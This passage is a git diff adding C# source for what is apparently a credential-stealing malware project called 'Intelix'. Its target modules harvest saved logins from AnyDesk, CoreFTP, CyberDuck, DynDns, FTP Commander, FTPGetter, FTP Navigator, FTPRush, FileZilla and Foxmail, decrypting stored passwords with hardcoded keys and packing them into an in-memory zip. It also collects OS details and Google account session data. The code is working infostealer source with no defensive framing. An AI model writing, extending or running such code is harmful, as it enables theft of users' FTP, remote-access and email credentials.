"\"type\":\"(.*?)\"").Groups[1].Value, + display_name = Regex.Match(value, "\"display_name\":\"(.*?)\"").Groups[1].Value, + display_email = Regex.Match(value, "\"display_email\":\"(.*?)\"").Groups[1].Value, + photo_url = Regex.Match(value, "\"photo_url\":\"(.*?)\"").Groups[1].Value, + selected = Regex.IsMatch(value, "\"selected\":true"), + default_user = Regex.IsMatch(value, "\"default_user\":true"), + authuser = (int.TryParse(Regex.Match(value, "\"authuser\":(\\d+)").Groups[1].Value, out result) ? result : 0), + valid_session = Regex.IsMatch(value, "\"valid_session\":true"), + obfuscated_id = Regex.Match(value, "\"obfuscated_id\":\"(.*?)\"").Groups[1].Value, + is_verified = Regex.IsMatch(value, "\"is_verified\":true") + }; + list.Add(item); + } + return list; + } +} diff --git a/New/Intelix.Helper/WindowsInfo.cs b/New/Intelix.Helper/WindowsInfo.cs new file mode 100644 index 0000000..9ba2d04 --- /dev/null +++ b/New/Intelix.Helper/WindowsInfo.cs @@ -0,0 +1,88 @@ +using System; +using Microsoft.Win32; + +namespace Intelix.Helper; + +public static class WindowsInfo +{ + public static string GetProductName() + { + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); + if (registryKey == null) + { + return "Unknown"; + } + string obj = (registryKey.GetValue("ProductName") as string) ?? "Unknown"; + string text = (registryKey.GetValue("ReleaseId") as string) ?? (registryKey.GetValue("DisplayVersion") as string) ?? ""; + return (obj + " " + text).Trim(); + } + catch + { + return "Unknown"; + } + } + + public static string GetBuildNumber() + { + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); + if (registryKey == null) + { + return "Unknown"; + } + return registryKey.GetValue("CurrentBuild")?.ToString() ?? registryKey.GetValue("CurrentBuildNumber")?.ToString() ?? "Unknown"; + } + catch + { + return "Unknown"; + } + } + + public static string GetArchitecture() + { + try + { + return Environment.Is64BitOperatingSystem ? "x64" : "x86"; + } + catch + { + return "Unknown"; + } + } + + public static string GetVersion() + { + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); + if (registryKey == null) + { + return "Unknown"; + } + object value = registryKey.GetValue("CurrentMajorVersionNumber"); + object value2 = registryKey.GetValue("CurrentMinorVersionNumber"); + if (value != null && value2 != null) + { + return $"{value}.{value2}"; + } + string text = registryKey.GetValue("CurrentVersion") as string; + if (!string.IsNullOrEmpty(text)) + { + return text; + } + return "Unknown"; + } + catch + { + return "Unknown"; + } + } + + public static string GetFullInfo() + { + return "OS Product: " + GetProductName() + "\nOS Build: " + GetBuildNumber() + "\nOS Arch: " + GetArchitecture(); + } +} diff --git a/New/Intelix.Targets.Applications/._AnyDesk.cs b/New/Intelix.Targets.Applications/._AnyDesk.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._AnyDesk.cs differ diff --git a/New/Intelix.Targets.Applications/._CoreFtp.cs b/New/Intelix.Targets.Applications/._CoreFtp.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._CoreFtp.cs differ diff --git a/New/Intelix.Targets.Applications/._CyberDuck.cs b/New/Intelix.Targets.Applications/._CyberDuck.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._CyberDuck.cs differ diff --git a/New/Intelix.Targets.Applications/._DynDns.cs b/New/Intelix.Targets.Applications/._DynDns.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._DynDns.cs differ diff --git a/New/Intelix.Targets.Applications/._FTPCommander.cs b/New/Intelix.Targets.Applications/._FTPCommander.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FTPCommander.cs differ diff --git a/New/Intelix.Targets.Applications/._FTPGetter.cs b/New/Intelix.Targets.Applications/._FTPGetter.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FTPGetter.cs differ diff --git a/New/Intelix.Targets.Applications/._FTPNavigator.cs b/New/Intelix.Targets.Applications/._FTPNavigator.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FTPNavigator.cs differ diff --git a/New/Intelix.Targets.Applications/._FTPRush.cs b/New/Intelix.Targets.Applications/._FTPRush.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FTPRush.cs differ diff --git a/New/Intelix.Targets.Applications/._FileZilla.cs b/New/Intelix.Targets.Applications/._FileZilla.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FileZilla.cs differ diff --git a/New/Intelix.Targets.Applications/._FoxMail.cs b/New/Intelix.Targets.Applications/._FoxMail.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._FoxMail.cs differ diff --git a/New/Intelix.Targets.Applications/._GithubGui.cs b/New/Intelix.Targets.Applications/._GithubGui.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._GithubGui.cs differ diff --git a/New/Intelix.Targets.Applications/._JetBrains.cs b/New/Intelix.Targets.Applications/._JetBrains.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._JetBrains.cs differ diff --git a/New/Intelix.Targets.Applications/._MobaXterm.cs b/New/Intelix.Targets.Applications/._MobaXterm.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._MobaXterm.cs differ diff --git a/New/Intelix.Targets.Applications/._Navicat.cs b/New/Intelix.Targets.Applications/._Navicat.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Navicat.cs differ diff --git a/New/Intelix.Targets.Applications/._Ngrok.cs b/New/Intelix.Targets.Applications/._Ngrok.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Ngrok.cs differ diff --git a/New/Intelix.Targets.Applications/._NoIp.cs b/New/Intelix.Targets.Applications/._NoIp.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._NoIp.cs differ diff --git a/New/Intelix.Targets.Applications/._Obs.cs b/New/Intelix.Targets.Applications/._Obs.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Obs.cs differ diff --git a/New/Intelix.Targets.Applications/._PlayIt.cs b/New/Intelix.Targets.Applications/._PlayIt.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._PlayIt.cs differ diff --git a/New/Intelix.Targets.Applications/._PuTTY.cs b/New/Intelix.Targets.Applications/._PuTTY.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._PuTTY.cs differ diff --git a/New/Intelix.Targets.Applications/._RDCMan.cs b/New/Intelix.Targets.Applications/._RDCMan.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._RDCMan.cs differ diff --git a/New/Intelix.Targets.Applications/._Rdp.cs b/New/Intelix.Targets.Applications/._Rdp.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Rdp.cs differ diff --git a/New/Intelix.Targets.Applications/._Sunlogin.cs b/New/Intelix.Targets.Applications/._Sunlogin.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Sunlogin.cs differ diff --git a/New/Intelix.Targets.Applications/._TeamSpeak.cs b/New/Intelix.Targets.Applications/._TeamSpeak.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._TeamSpeak.cs differ diff --git a/New/Intelix.Targets.Applications/._TeamViewer.cs b/New/Intelix.Targets.Applications/._TeamViewer.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._TeamViewer.cs differ diff --git a/New/Intelix.Targets.Applications/._TotalCommander.cs b/New/Intelix.Targets.Applications/._TotalCommander.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._TotalCommander.cs differ diff --git a/New/Intelix.Targets.Applications/._WinSCP.cs b/New/Intelix.Targets.Applications/._WinSCP.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._WinSCP.cs differ diff --git a/New/Intelix.Targets.Applications/._Xmanager.cs b/New/Intelix.Targets.Applications/._Xmanager.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Applications/._Xmanager.cs differ diff --git a/New/Intelix.Targets.Applications/AnyDesk.cs b/New/Intelix.Targets.Applications/AnyDesk.cs new file mode 100644 index 0000000..5656c50 --- /dev/null +++ b/New/Intelix.Targets.Applications/AnyDesk.cs @@ -0,0 +1,21 @@ +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class AnyDesk : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\ProgramData\\AnyDesk\\service.conf"; + if (File.Exists(text)) + { + string text2 = "AnyDesk\\service.conf"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "AnyDesk"; + counterApplications.Files.Add(text + " => " + text2); + counter.Applications.Add(counterApplications); + zip.AddFile(text2, File.ReadAllBytes(text)); + } + } +} diff --git a/New/Intelix.Targets.Applications/CoreFtp.cs b/New/Intelix.Targets.Applications/CoreFtp.cs new file mode 100644 index 0000000..d28c3ab --- /dev/null +++ b/New/Intelix.Targets.Applications/CoreFtp.cs @@ -0,0 +1,87 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Security.Cryptography; +using System.Text; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class CoreFtp : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "CoreFTP"; + using RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\FTPWare\\COREFTP\\Sites"); + if (registryKey == null) + { + return; + } + List list = new List(); + foreach (string item in from n in registryKey.GetSubKeyNames() + orderby n + select n) + { + try + { + using RegistryKey registryKey2 = registryKey.OpenSubKey(item); + if (registryKey2 != null) + { + object value = registryKey2.GetValue("Host"); + object value2 = registryKey2.GetValue("User"); + object value3 = registryKey2.GetValue("PW"); + if (value != null) + { + string text = (value as string) ?? value.ToString(); + string text2 = (value2 as string) ?? value2?.ToString() ?? ""; + string text3 = DecryptCoreFtpPassword((value3 as string) ?? value3?.ToString() ?? ""); + list.Add("Url: " + text + ":21\nUsername: " + text2 + "\nPassword: " + text3 + "\n"); + counterApplications.Files.Add(registryKey2.Name ?? ""); + } + } + } + catch + { + } + } + if (list.Count > 0) + { + zip.AddFile("CoreFTP\\Hosts.txt", Encoding.UTF8.GetBytes(string.Join("\n", list))); + counter.Applications.Add(counterApplications); + } + } + + private static string DecryptCoreFtpPassword(string hexCipher) + { + byte[] bytes = Encoding.ASCII.GetBytes("hdfzpysvpzimorhk"); + byte[] iV = new byte[16]; + byte[] array = HexToBytes(hexCipher); + using Aes aes = Aes.Create(); + aes.KeySize = 128; + aes.BlockSize = 128; + aes.Key = bytes; + aes.IV = iV; + aes.Mode = CipherMode.ECB; + aes.Padding = PaddingMode.Zeros; + using MemoryStream memoryStream = new MemoryStream(); + using ICryptoTransform transform = aes.CreateDecryptor(); + using CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write); + cryptoStream.Write(array, 0, array.Length); + cryptoStream.FlushFinalBlock(); + return Encoding.UTF8.GetString(memoryStream.ToArray()); + } + + private static byte[] HexToBytes(string hex) + { + int num = hex.Length / 2; + byte[] array = new byte[num]; + for (int i = 0; i < num; i++) + { + array[i] = Convert.ToByte(hex.Substring(i * 2, 2), 16); + } + return array; + } +} diff --git a/New/Intelix.Targets.Applications/CyberDuck.cs b/New/Intelix.Targets.Applications/CyberDuck.cs new file mode 100644 index 0000000..58af8d0 --- /dev/null +++ b/New/Intelix.Targets.Applications/CyberDuck.cs @@ -0,0 +1,30 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class CyberDuck : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Cyberduck", "Profiles"); + if (!Directory.Exists(path)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "CyberDuck"; + string[] files = Directory.GetFiles(path); + foreach (string text in files) + { + if (text.EndsWith(".cyberduckprofile")) + { + string text2 = "CyberDuck\\" + Path.GetFileName(text); + zip.AddFile(text2, File.ReadAllBytes(path)); + counterApplications.Files.Add(text + " => " + text2); + } + } + counter.Applications.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Applications/DynDns.cs b/New/Intelix.Targets.Applications/DynDns.cs new file mode 100644 index 0000000..15ea54b --- /dev/null +++ b/New/Intelix.Targets.Applications/DynDns.cs @@ -0,0 +1,51 @@ +using System; +using System.Globalization; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class DynDns : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\ProgramData\\Dyn\\Updater\\config.dyndns"; + if (File.Exists(text)) + { + string[] array = File.ReadAllLines(text); + if (array.Length != 0) + { + string text2 = "Dyn\\Passwords.txt"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Dyn"; + counterApplications.Files.Add(text + " => " + text2); + counter.Applications.Add(counterApplications); + zip.AddTextFile(text2, "UserName: " + array[1].Substring(9) + "\r\nPassword: " + DecryptDynDns(array[2].Substring(9))); + } + } + } + + private string DecryptDynDns(string encrypted) + { + string text = string.Empty; + for (int i = 0; i < encrypted.Length; i += 2) + { + text += (char)int.Parse(encrypted.Substring(i, 2), NumberStyles.HexNumber); + } + char[] array = text.ToCharArray(); + char[] array2 = new char[text.Length]; + for (int j = 0; j < array2.Length; j++) + { + try + { + int num = 0; + array2[j] = (char)(array[j] ^ Convert.ToChar("t6KzXhCh".Substring(num, 1))); + num = (num + 1) % 8; + } + catch (Exception) + { + } + } + return new string(array2); + } +} diff --git a/New/Intelix.Targets.Applications/FTPCommander.cs b/New/Intelix.Targets.Applications/FTPCommander.cs new file mode 100644 index 0000000..c993e04 --- /dev/null +++ b/New/Intelix.Targets.Applications/FTPCommander.cs @@ -0,0 +1,66 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Applications; + +public class FTPCommander : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string[] obj = new string[5] + { + "C:\\Program Files (x86)\\FTP Commander Deluxe\\Ftplist.txt", + "C:\\Program Files (x86)\\FTP Commander\\Ftplist.txt", + "C:\\cftp\\Ftplist.txt", + "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\VirtualStore\\Program Files (x86)\\FTP Commander\\Ftplist.txt", + "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\VirtualStore\\Program Files (x86)\\FTP Commander Deluxe\\Ftplist.txt" + }; + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "FTPCommander" + }; + List list = new List(); + string[] array = obj; + foreach (string text in array) + { + if (!File.Exists(text)) + { + continue; + } + string[] array2 = File.ReadAllLines(text); + foreach (string text2 in array2) + { + if (string.IsNullOrWhiteSpace(text2)) + { + continue; + } + string[] array3 = text2.Split(';'); + if (array3.Length >= 6) + { + string text3 = array3[1].Split('=')[1]; + string text4 = array3[2].Split('=')[1]; + string input = array3[3].Split('=')[1]; + string text5 = array3[4].Split('=')[1]; + if (!(array3[5].Split('=')[1] != "0")) + { + string text6 = Xor.DecryptString(input, 25); + list.Add("Url: " + text3 + ":" + (string.IsNullOrEmpty(text4) ? "21" : text4) + "\nUsername: " + text5 + "\nPassword: " + text6 + "\n"); + string text7 = "FTP Commander\\Hosts.txt"; + counterApplications.Files.Add(text + " => " + text7); + } + } + } + } + if (list.Count > 0) + { + string text8 = "FTP Commander\\Hosts.txt"; + zip.AddFile(text8, Encoding.UTF8.GetBytes(string.Join("\n", list))); + counterApplications.Files.Add(text8 ?? ""); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/FTPGetter.cs b/New/Intelix.Targets.Applications/FTPGetter.cs new file mode 100644 index 0000000..eddfae1 --- /dev/null +++ b/New/Intelix.Targets.Applications/FTPGetter.cs @@ -0,0 +1,54 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class FTPGetter : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\Users\\" + Environment.UserName + "\\AppData\\Roaming\\FTPGetter\\servers.xml"; + if (!File.Exists(text)) + { + return; + } + string input = File.ReadAllText(text, Encoding.UTF8); + Regex regex = new Regex("]*>(.*?)", RegexOptions.IgnoreCase | RegexOptions.Singleline); + Regex regex2 = new Regex("\\s*(?.*?)\\s*", RegexOptions.IgnoreCase | RegexOptions.Singleline); + Regex regex3 = new Regex("\\s*(?\\d+)\\s*", RegexOptions.IgnoreCase | RegexOptions.Singleline); + Regex regex4 = new Regex("\\s*(?.*?)\\s*", RegexOptions.IgnoreCase | RegexOptions.Singleline); + Regex regex5 = new Regex("\\s*(?.*?)\\s*", RegexOptions.IgnoreCase | RegexOptions.Singleline); + List list = new List(); + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "FTPGetter" + }; + foreach (Match item in regex.Matches(input)) + { + string value = item.Groups[1].Value; + Match match = regex2.Match(value); + if (match.Success) + { + string text2 = match.Groups["v"].Value.Trim(); + Match match2 = regex3.Match(value); + string text3 = (match2.Success ? match2.Groups["v"].Value.Trim() : "21"); + Match match3 = regex4.Match(value); + string text4 = (match3.Success ? match3.Groups["v"].Value.Trim() : ""); + Match match4 = regex5.Match(value); + string text5 = (match4.Success ? match4.Groups["v"].Value.Trim() : ""); + list.Add("Url: " + text2 + ":" + (string.IsNullOrEmpty(text3) ? "21" : text3) + "\nUsername: " + text4 + "\nPassword: " + text5 + "\n"); + counterApplications.Files.Add(text + " => FTPGetter\\Hosts.txt"); + } + } + if (list.Count > 0) + { + zip.AddFile("FTPGetter\\Hosts.txt", Encoding.UTF8.GetBytes(string.Join("\n", list))); + counterApplications.Files.Add("FTPGetter\\Hosts.txt"); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/FTPNavigator.cs b/New/Intelix.Targets.Applications/FTPNavigator.cs new file mode 100644 index 0000000..bbdf73d --- /dev/null +++ b/New/Intelix.Targets.Applications/FTPNavigator.cs @@ -0,0 +1,50 @@ +using System.Collections.Generic; +using System.IO; +using System.Text; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Applications; + +public class FTPNavigator : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\FTP Navigator\\Ftplist.txt"; + if (!File.Exists(text)) + { + return; + } + string[] array = File.ReadAllLines(text); + List list = new List(); + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "FTP Navigator" + }; + string[] array2 = array; + foreach (string text2 in array2) + { + if (!string.IsNullOrWhiteSpace(text2)) + { + string[] array3 = text2.Split(';'); + string text3 = array3[1].Split('=')[1]; + string text4 = array3[2].Split('=')[1]; + string input = array3[3].Split('=')[1]; + string text5 = array3[4].Split('=')[1]; + if (!(array3[5].Split('=')[1] != "0")) + { + string text6 = Xor.DecryptString(input, 25); + list.Add("Url: " + text3 + ":" + (string.IsNullOrEmpty(text4) ? "21" : text4) + "\nUsername: " + text5 + "\nPassword: " + text6 + "\n"); + counterApplications.Files.Add(text + " => FTP Navigator\\Hosts.txt"); + } + } + } + if (list.Count > 0) + { + string text7 = "FTP Navigator\\Hosts.txt"; + zip.AddFile(text7, Encoding.UTF8.GetBytes(string.Join("\n", list))); + counterApplications.Files.Add(text7); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/FTPRush.cs b/New/Intelix.Targets.Applications/FTPRush.cs new file mode 100644 index 0000000..9b74ff2 --- /dev/null +++ b/New/Intelix.Targets.Applications/FTPRush.cs @@ -0,0 +1,68 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class FTPRush : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\Users\\" + Environment.UserName + "\\Documents\\FTPRush\\site.json"; + if (!File.Exists(text)) + { + return; + } + string input = File.ReadAllText(text); + Regex regex = new Regex("\"Server\"\\s*:\\s*\\{(.*?)\\}", RegexOptions.IgnoreCase | RegexOptions.Singleline); + Regex regex2 = new Regex("\"Host\"\\s*:\\s*\"(?[^\"]*)\"", RegexOptions.IgnoreCase); + Regex regex3 = new Regex("\"Port\"\\s*:\\s*(?\\d+)", RegexOptions.IgnoreCase); + Regex regex4 = new Regex("\"Username\"\\s*:\\s*\"(?[^\"]*)\"", RegexOptions.IgnoreCase); + Regex regex5 = new Regex("\"Base64Password\"\\s*:\\s*\"(?[^\"]*)\"", RegexOptions.IgnoreCase); + List list = new List(); + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "FTPRush" + }; + foreach (Match item in regex.Matches(input)) + { + string value = item.Groups[1].Value; + Match match = regex2.Match(value); + if (!match.Success) + { + continue; + } + string value2 = match.Groups["host"].Value; + Match match2 = regex3.Match(value); + string text2 = (match2.Success ? match2.Groups["port"].Value : "21"); + Match match3 = regex4.Match(value); + string text3 = (match3.Success ? match3.Groups["user"].Value : ""); + Match match4 = regex5.Match(value); + string text4 = ""; + if (match4.Success && !string.IsNullOrEmpty(match4.Groups["b64"].Value)) + { + try + { + byte[] bytes = Convert.FromBase64String(match4.Groups["b64"].Value); + text4 = Encoding.UTF8.GetString(bytes); + } + catch + { + text4 = ""; + } + } + list.Add("Url: " + value2 + ":" + text2 + "\nUsername: " + text3 + "\nPassword: " + text4 + "\n"); + counterApplications.Files.Add(text + " => FTPRush\\Hosts.txt"); + } + if (list.Count > 0) + { + string text5 = "FTPRush\\Hosts.txt"; + zip.AddFile(text5, Encoding.UTF8.GetBytes(string.Join("\n", list))); + counterApplications.Files.Add(text5); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/FileZilla.cs b/New/Intelix.Targets.Applications/FileZilla.cs new file mode 100644 index 0000000..9aa4d19 --- /dev/null +++ b/New/Intelix.Targets.Applications/FileZilla.cs @@ -0,0 +1,56 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Xml; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class FileZilla : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\FileZilla\\"; + string[] array = new string[2] + { + text + "recentservers.xml", + text + "sitemanager.xml" + }; + if (!File.Exists(array[0]) && !File.Exists(array[1])) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "FileZilla"; + List list = new List(); + string[] array2 = array; + foreach (string text2 in array2) + { + if (!File.Exists(text2)) + { + continue; + } + XmlDocument xmlDocument = new XmlDocument(); + xmlDocument.Load(text2); + foreach (XmlNode item in xmlDocument.GetElementsByTagName("Server")) + { + string text3 = item?["Pass"]?.InnerText; + if (!string.IsNullOrEmpty(text3)) + { + string text4 = "ftp://" + item["Host"]?.InnerText + ":" + item["Port"]?.InnerText + "/"; + string text5 = item["User"]?.InnerText; + string text6 = Encoding.UTF8.GetString(Convert.FromBase64String(text3)); + list.Add("Url: " + text4 + "\nUsername: " + text5 + "\nPassword: " + text6); + } + } + string text7 = "FileZilla\\" + Path.GetFileName(text2); + zip.AddFile(text7, File.ReadAllBytes(text2)); + counterApplications.Files.Add(text2 + " => " + text7); + } + string text8 = "FileZilla\\Hosts.txt"; + counterApplications.Files.Add(text8 ?? ""); + zip.AddTextFile(text8, string.Join("\n\n", list.ToArray())); + counter.Applications.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Applications/FoxMail.cs b/New/Intelix.Targets.Applications/FoxMail.cs new file mode 100644 index 0000000..eb8cf48 --- /dev/null +++ b/New/Intelix.Targets.Applications/FoxMail.cs @@ -0,0 +1,202 @@ +using System; +using System.IO; +using System.Text; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class FoxMail : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Classes\\Foxmail.url.mailto\\Shell\\open\\command"); + if (registryKey == null) + { + return; + } + string text = registryKey.GetValue("") as string; + if (string.IsNullOrEmpty(text)) + { + return; + } + int num = text.LastIndexOf("Foxmail.exe", StringComparison.OrdinalIgnoreCase); + if (num < 0) + { + return; + } + string path = Path.Combine(text.Substring(0, num).Replace("\"", "").TrimEnd('\\', ' '), "Storage"); + if (!Directory.Exists(path)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "FoxMail"; + string[] directories = Directory.GetDirectories(path, "*@*", SearchOption.TopDirectoryOnly); + foreach (string text2 in directories) + { + string fileName = Path.GetFileName(text2); + string text3 = Path.Combine(text2, "Accounts"); + if (!Directory.Exists(text3)) + { + continue; + } + string text4 = Path.Combine(text3, "Account.rec0"); + if (File.Exists(text4)) + { + string text5 = Path.Combine(Path.GetTempPath(), $"Account_{Guid.NewGuid():N}.rec"); + File.Copy(text4, text5, overwrite: true); + bool found; + int ver; + string text6 = ParseSecretFileAndGetPassword(text5, out found, out ver); + if (found) + { + string text7 = "Foxmail\\" + fileName + "\\Account.txt"; + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("E-Mail: " + fileName); + stringBuilder.AppendLine("Password: " + text6); + stringBuilder.AppendLine("FoxmailVersionDetected: " + ((ver == 0) ? "6.x" : "7.x or later")); + zip.AddTextFile(text7, stringBuilder.ToString()); + counterApplications.Files.Add(text4 + " => " + text7); + } + else + { + string text8 = "Foxmail\\" + fileName + "\\Account.rec0"; + zip.AddFile(text8, File.ReadAllBytes(text4)); + counterApplications.Files.Add(text4 + " => " + text8); + } + File.Delete(text5); + } + } + if (counterApplications.Files.Count > 0) + { + counter.Applications.Add(counterApplications); + } + } + + private string ParseSecretFileAndGetPassword(string path, out bool found, out int ver) + { + found = false; + ver = 1; + byte[] array = File.ReadAllBytes(path); + if (array == null || array.Length == 0) + { + return string.Empty; + } + if (array[0] == 208) + { + ver = 0; + } + else + { + ver = 1; + } + string text = ""; + string value = ""; + for (int i = 0; i < array.Length; i++) + { + byte b = array[i]; + if (b > 32 && b < 127 && b != 61) + { + string text2 = text; + char c = (char)b; + text = text2 + c; + if (text.Equals("Account", StringComparison.Ordinal)) + { + value = ReadAsciiValue(array, ref i, ver); + text = ""; + } + else if (text.Equals("POP3Account", StringComparison.Ordinal)) + { + value = ReadAsciiValue(array, ref i, ver); + text = ""; + } + else if ((text.Equals("Password", StringComparison.Ordinal) || text.Equals("POP3Password", StringComparison.Ordinal)) && !string.IsNullOrEmpty(value)) + { + string strHash = ReadAsciiValue(array, ref i, ver); + string result = DecodePW(ver, strHash); + found = true; + return result; + } + } + else + { + text = ""; + } + } + return string.Empty; + } + + private string ReadAsciiValue(byte[] bits, ref int jx, int ver) + { + int i = jx + 9; + if (ver == 0) + { + i = jx + 2; + } + StringBuilder stringBuilder = new StringBuilder(); + for (; i < bits.Length && bits[i] > 32 && bits[i] < 127; i++) + { + stringBuilder.Append((char)bits[i]); + } + jx = i; + return stringBuilder.ToString(); + } + + private string DecodePW(int ver, string strHash) + { + string text = string.Empty; + int[] array; + int num; + if (ver == 0) + { + array = new int[8] { 126, 100, 114, 97, 71, 111, 110, 126 }; + num = Convert.ToInt32("5A", 16); + } + else + { + array = new int[8] { 126, 70, 64, 55, 37, 109, 36, 126 }; + num = Convert.ToInt32("71", 16); + } + int num2 = strHash.Length / 2; + int num3 = 0; + int[] array2 = new int[num2]; + for (int i = 0; i < num2; i++) + { + array2[i] = Convert.ToInt32(strHash.Substring(num3, 2), 16); + num3 += 2; + } + int[] array3 = new int[array2.Length]; + array3[0] = array2[0] ^ num; + if (array2.Length > 1) + { + Array.Copy(array2, 1, array3, 1, array2.Length - 1); + } + while (array2.Length > array.Length) + { + int[] array4 = new int[array.Length * 2]; + Array.Copy(array, 0, array4, 0, array.Length); + Array.Copy(array, 0, array4, array.Length, array.Length); + array = array4; + } + int[] array5 = new int[array2.Length]; + for (int j = 1; j < array2.Length; j++) + { + array5[j - 1] = array2[j] ^ array[j - 1]; + } + int[] array6 = new int[array5.Length]; + for (int k = 0; k < array5.Length - 1; k++) + { + if (array5[k] - array3[k] < 0) + { + array6[k] = array5[k] + 255 - array3[k]; + } + else + { + array6[k] = array5[k] - array3[k]; + } + text += (char)array6[k]; + } + return text; + } +} diff --git 